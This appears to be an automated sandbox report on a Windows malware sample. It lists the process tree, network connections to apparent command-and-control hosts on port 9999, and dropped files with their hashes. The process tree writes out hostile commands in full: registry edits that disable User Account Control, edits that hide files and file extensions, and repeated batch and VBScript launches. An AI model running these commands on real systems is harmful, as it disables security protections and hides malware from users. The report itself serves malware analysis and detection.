C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jyYQIAEw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwEMoQgY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ScccoAYM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gOcYsUQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OEsIowso.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IGgUEUwQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\omMQMEEc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgkEwYYc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JCYIMYYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vuYAgscU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgMcUgAo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UmIEwEQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 200.87.164.69:9999 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.251.36.46:80 google.com tcp
NL 142.251.36.46:80 google.com tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe

MD5 55cf088a32a74f851db9ad823d84252a
SHA1 1e1bc9e589a9f414e07dd6fd0e370a64e34b6eb3
SHA256 ad5dc9996e438f7152e6dd19737d52c516cc389eaad8dff06c3d2ce5f59f6e9e
SHA512 f060ac9c700a2d541072b22a0134ce21374368656fa549c816a0f8a4798573cf17fd2e7b04e72ef766b8f5729522c1806a90d2e248bfe15d46a91813599ffcc6

C:\ProgramData\WwgMQcMw\LyocAoAM.exe

MD5 9df4048ad1ac758b5aedb1654c6fb76d
SHA1 73db2126223617b97bd6515d57e1cf4103171290
SHA256 80f3a259c54d16e7a71cee3ee21b853d89424f3321802f3976b24d264f1a2cb5
SHA512 944ce4e6754d75fbb13355223730ac42f81ea87148d7524ff769de108bf7acc2fbb47754d234f8a5cad3e6a23499d093fd685b9ce9941770c8af207d58d3ea76

C:\Users\Admin\AppData\Local\Temp\eewUwIAg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/2644-135-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1656-138-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KmEMMMck.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/1252-142-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oiUcsAoE.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/4044-146-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\buskYcUk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/4956-150-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zMEQogAA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/1868-154-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bcQoEgII.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/1176-158-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ncIgIoUw.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/4892-161-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HaIYwMoI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/1968-166-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\VSYAEMQM.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/3876-170-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pooUoUQI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/4560-174-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QCgIAsYA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3532-178-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KwcAQkMA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3932-182-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KYEkMowQ.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4524-187-0x0000000000400000-0x000000000043D000-memory.dmp

C:\ProgramData\WwgMQcMw\LyocAoAM.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

C:\Users\Admin\AppData\Local\Temp\WuIYEEIY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4700-191-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\fSgEsIQI\dAkcYIYg.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

C:\Users\Admin\AppData\Local\Temp\OQUEQUwg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3508-196-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AsIMYIoI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4360-200-0x0000000000400000-0x000000000043D000-memory.dmp

C:\ProgramData\WwgMQcMw\LyocAoAM.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

C:\Users\Admin\AppData\Local\Temp\lmQkwEsU.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
